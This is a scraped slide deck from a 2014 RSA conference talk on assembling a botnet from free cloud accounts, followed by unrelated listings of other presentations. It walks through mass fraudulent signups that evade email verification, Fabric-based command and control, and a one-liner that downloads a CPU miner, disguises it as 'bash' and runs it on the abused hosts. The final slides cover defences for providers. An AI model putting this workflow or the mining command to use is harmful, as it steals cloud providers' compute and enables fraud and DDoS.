cloud ninja
play

CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, - PowerPoint PPT Presentation

Nov 12, 2022 •493 likes •887 views

CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, 2014 | 8:00am 9:00am | West | Room: 3002 Overview What are these guys talking about? Main Topics Could we build a botnet from freely available cloud services? Will we

  1. CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, 2014 | 8:00am – 9:00am | West | Room: 3002

  2. Overview What are these guys talking about? Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? 2

  3. Cloud PaaS Platform as a Service 4

  4. Free Cloud Services Platform as a Service <Insert with other providers later> Reference: http://goo.gl/AZ4nYp 5

  5. Free Cloud Services Development Environment as a Service 6

  6. AUTOMATION Scripting the Cloud

  7. Cloud Providers (In)Security Usability vs Security Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card 8

  8. Fraudulent Account Registration Anti-Automation 66 % Email Confirmation Only 33 % More Anti-Automation EMAIL CAPTCHA CREDIT CARD PHONE 9

  9. Cloud Providers (In)Security Usability vs Security Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card 10

  10. Unique Email Addresses Realistic Randomness Avoid Pattern Recognition <Insert wall of random email addresses> 11

  11. Real Email Addresses Realistic Randomness Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld 12

  12. Plethora of Email Addresses SMTP Services Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains 13

  13. Free DNS Subdomains Unlimited email addresses 14

  14. Receiving Email and Processing Free Signups What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted STMP to HTTP POST/JSON requests 15

  15. Email Confirmation Token Processing SMTP Services Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links 16

  16. DEMONSTRATION Automatic Account Creation

  17. Email Addresses Automated Registration Workflow 18

  18. Storing Account Information Keeping track of all accounts MongoDB • MongoLab • MongoHQ 19

  19. FUNTIVITIES Botnets Are Fun!

  20. Botnet Activities Now we have a botnet! Fun! What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage 21

  21. Command & Control Botnet C2 What are we using? • Fabric - Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts – P – z 20 • fab run_command 22

  22. Distributed Command Unique Amazon IP Addresses [na1.cloudbox.net:15149]: curl http://icanhazip.com 184.169.182.155 [eu1.cloudbox.net:14317]: curl http://icanhazip.com 176.34.56.246 [na1.cloudbox.net:16960]: curl http://icanhazip.com 54.251.42.128 [na1.cloudbox.net:15167]: curl http://icanhazip.com 54.216.236.7 [na1.cloudbox.net:14319]: curl http://icanhazip.com 54.228.153.1 [na1.cloudbox.net:14358]: curl http://icanhazip.com 54.216.3.252 23

  23. Litecoin Mining All your processors are belong to us Make money, money • Deploying miners • One command for $$$ if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer- 2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2- linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux- x86_64.tar.gz && mv minerd bash; fi; screen ./bash – url=stratum+tcp://china.mine-litecoin.com --userpass=ninja.47:47; rm bash 24

  24. Distributed Command Load After Crypto Currency Mining ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:13378 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15151 | 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:16351 | 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:14358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:12152 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:12151 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:12150 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:12149 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:16298 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:16297 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:13161 | 1 user, load average: 26.04, 25.57, 20.02 25

  25. Litecoin Mining All your processors are belong to us 26

  26. Unlimited Storage Space Refer Fake Friends 27

  27. Unlimited Storage Space Refer Fake Friends 28

  28. DEMONSTRATION Distributed Denial of Service (DDoS)

  29. DETECTION No one can catch a ninja!

  30. Disaster Recovery Plan Armadillo Up ™ Automatic Backups • Propagate to other similar services - e.g. MongoLab   MongoHQ • Infrastructure across multiple service providers • Easily migrated 31

  31. RISING TREND Active Attacks

  32. Cloud Provider Registration Adaptation 33

  33. Cloud Provider Registration Adaptation 34

  34. Cloud Provider Registration Adaptation 35

  35. PROTECTION Bot Busters

  36. Protection Usability vs Security What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions 37

  37. Protection At Abuse vs At Registration What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf 38

  38. Protection At Abuse vs At Registration Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf 39

  39. Oscar Salazar @tracertea Rob Ragan @sweepthatleg THANK YOU CONTACT@BISHOPFOX.COM

Recommend

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of a C64 demo About me Linux kernel hacker embedded systems low level computing prefers limited machines and thats mainly because. . . Ninja /

821 views • 26 slides
Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA

Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA

NINJA Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA experiment Ayami Hiramoto (Kyoto Univ.) Y . Suzuki, T.Fukuda, T,Nakaya for the NINJA collaboration 2019.09.09 2

728 views • 30 slides
Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi

Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi

Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi LARUELLE Cloud &amp; Automation @mehdilaruelle Github Access Table of contents Contextualization 1 How does Vault work ? 2 Steps to become a

875 views • 22 slides
Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti

Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti

Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti vv2236 Kuangya Zhai kz2219 Overview Wiimote controlled object slicing game on SoCKit board Motivated by Fruit Ninja game Storyline :

431 views • 23 slides
CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont

CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont

CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont know everything (surprise!), if I stare blankly after a question, go to https://cmake.org/ Spoiler alert: or https://ninja-build.org/ Contents

862 views • 50 slides
current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe

current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe

Study of neutrino charged current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe Univ., Introduction Nihon Univ., Kyoto Univ., Yokohama national Univ. ICRR and Univ. of Tokyo NINJA experiment

623 views • 26 slides
WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt

WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt

WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt Ninja Style Online Marketing White Hat Tips &amp; Tricks Every Woo Store Owner Must Know To Run Successful &amp; Profitable Retail Shops. By Emanuel

838 views • 20 slides
BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1

BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1

BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1 Introduction 2 Overview Apparently, Hospitals will always need Savings Stuff vs. Staff Low-hanging Fruit programs are popular with

375 views • 20 slides
Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come

Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come

Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come from? Why Cloud? Cloud for small, medium, enterprise, and government Barriers to adoption Embracing Cloud Social Mobile Cloud

972 views • 45 slides
SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even

SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even

FAST TRACK YOUR FACEBOOK PPC SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even HTML pages work fine! Do you have more time than money? Want control? Use Wordpress &amp; Thrive Themes Landing Page

629 views • 25 slides
Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja

Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja

Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja Israel.pm / Haifa.pm / TelAviv.pm / Rehovot.pm I do system, networking, web, applications, etc. http://blogs.perl.org/users/sawyer_x/

769 views • 31 slides
SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud

SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud

SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud Tour of the buzzwords, myths and realities Whats in store for me, the boss, the company, the industry? Your cloud, our cloud their

224 views • 19 slides
Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview

Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview

Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview What is Little-JIL? Jared Why use Little-JIL? Douglas Interrupt if you have a question What is Little-JIL? Research at UMass

805 views • 52 slides
ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko?

ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko?

KAI KOENIG (@AGENTK) ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko? Anko-related idioms and language concepts Anko DSL The hidden parts of Anko Anko VS The Rest Final thoughts WHAT ARE

807 views • 54 slides
CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

Cornell CS5412 Cloud Computing (Spring 2015) 1 CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is cheaper! The cloud business model is growing at an unparalleled pace without any limit in sight

632 views • 45 slides
CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

1 CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is cheaper The cloud business model is growing at an unparalleled pace without any limit in sight In the future everything will be on the cloud

945 views • 65 slides
The Cloud Is Big! The Cloud Is Hot! IT industry Constitutes about 2% of total US energy

The Cloud Is Big! The Cloud Is Hot! IT industry Constitutes about 2% of total US energy

The Data Furnace: Heating Up with Cloud Computing Jie Liu , Michel Goraczko, Jiakang Lu Sean James, Christian Belady Kamin Whitehouse Microsoft University of Virginia The Cloud Is Big! The Cloud Is Hot! IT industry Constitutes about 2%

551 views • 16 slides
Berkeley Ninja Architecture ACID vs BASE 1.Strong Consistency 1. Weak consistency 2.

Berkeley Ninja Architecture ACID vs BASE 1.Strong Consistency 1. Weak consistency 2.

Berkeley Ninja Architecture ACID vs BASE 1.Strong Consistency 1. Weak consistency 2. Availability not 2. Availability is a considered primary design element 3. Conservative 3. Aggressive --&gt; large-scale --&gt; Traditional

566 views • 40 slides
Cloud Computing &amp; Cloud Models Cloud Models Topics Defining cloud computing

Cloud Computing &amp; Cloud Models Cloud Models Topics Defining cloud computing

Cloud Computing &amp; Cloud Models Cloud Models Topics Defining cloud computing Understanding: Distributed Application Design Resource Management Automation Virtualized Computing Environments High-performance Computing

1.02k views • 49 slides
NVIDIA GPUs in the Cloud 4 EVOLVING CLOUD REQUIREMENTS On Off Hybrid Cloud premises premises

NVIDIA GPUs in the Cloud 4 EVOLVING CLOUD REQUIREMENTS On Off Hybrid Cloud premises premises

NVIDIA GPUs in the Cloud 4 EVOLVING CLOUD REQUIREMENTS On Off Hybrid Cloud premises premises Connecting clouds New workloads Components to disrupt SOFTLAYER CAPABILITIES OVERVIEW 5 GLOBAL CLOUD PLATFORM Unified architecture enabled by

390 views • 17 slides
Be a Binary Rockst r An Introduction to Program Analysis with Binary Ninja Agenda

Be a Binary Rockst r An Introduction to Program Analysis with Binary Ninja Agenda

Be a Binary Rockst r An Introduction to Program Analysis with Binary Ninja Agenda Motivation Current State of Program Analysis Design Goals of Binja Program Analysis Building Tools 2 Motivation 3 Tooling - Concrete -&gt;

963 views • 77 slides
github.com/18F/cg-workshop I Want You to use cloud.gov : Focus on mission &quot; :

github.com/18F/cg-workshop I Want You to use cloud.gov : Focus on mission &quot; :

09:00 Welcome Shashank Khandelwal 09:10 cloud.gov Overview 09:40 cloud.gov Hands-on I 10:20 Break 10:30 Federalist Will Slack 10:40 cloud.gov Hands-on II 11:30 Q &amp; A github.com/18F/cg-workshop I Want You to use cloud.gov

461 views • 34 slides
Cloud Ross Mallace Commercial Director Cloud/SaaS Cloud is here. ALL By 2020 most core

Cloud Ross Mallace Commercial Director Cloud/SaaS Cloud is here. ALL By 2020 most core

Banking in the Cloud Ross Mallace Commercial Director Cloud/SaaS Cloud is here. ALL By 2020 most core most banking initiatives will be in the cloud John Schlesinger Changing Cloud Adoption in Financial Services Over 100

561 views • 20 slides
Ninja Scaning by Fyodor CanSecWest 2009 March 20, 3:50 PM

Ninja Scaning by Fyodor CanSecWest 2009 March 20, 3:50 PM

Insecure.Org Insecure.Org Ninja Scaning by Fyodor CanSecWest 2009 March 20, 3:50 PM http://insecure.org/presentations/CSW09/ Insecure.Org Insecure.Org Ncat http://nmap.org/ncat/ Insecure.Org Insecure.Org Modern Networking Features

689 views • 21 slides

More recommend